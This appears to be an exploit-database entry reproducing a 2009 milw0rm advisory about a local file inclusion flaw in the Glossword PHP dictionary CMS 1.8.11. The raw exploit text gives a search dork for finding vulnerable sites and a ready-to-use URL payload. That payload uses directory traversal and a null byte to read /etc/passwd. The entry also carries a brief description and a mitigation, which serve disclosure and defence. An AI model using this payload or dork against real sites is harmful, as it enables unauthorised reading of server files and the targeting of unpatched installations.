header-logo
Suggest Exploit
vendor:
Glossword
by:
t0fx
7,5
CVSS
HIGH
Local File Inclusion (LFI)
22
CWE
Product Name: Glossword
Affected Version From: 1.8.11
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Firefox 3
2009

Glossword 1.8.11 LFI

Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia. A Local File Inclusion (LFI) vulnerability was discovered in all versions of Glossword 1.8.11 and higher. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. “../”) to the vulnerable web server. This can allow the attacker to view sensitive files on the web server, such as the /etc/passwd file.

Mitigation:

Upgrade to the latest version of Glossword and ensure that all user input is properly sanitized.
Source

Exploit-DB raw data:

|-->Glossword 1.8.11 LFI
|-->CMS INFORMATION:
|                                                   
|-->WEB: http://code.google.com/p/glossword/                              
|-->DOWNLOAD: http://code.google.com/p/glossword/downloads/list                                  
|-->DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia.            
|                                               
|  CMS VULNERABILITY:                                       
|                                               
|-->TESTED ON: firefox 3                                           
|-->DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ...                                           
|-->CATEGORY: LOCAL FILE INCLUSION (LFI)               
|-->AFFECT VERSION: all > 1.8.11                           
|-->Author: t0fx                                                                    
|-->GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais

|-->Exploit :
| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00

# milw0rm.com [2009-06-24]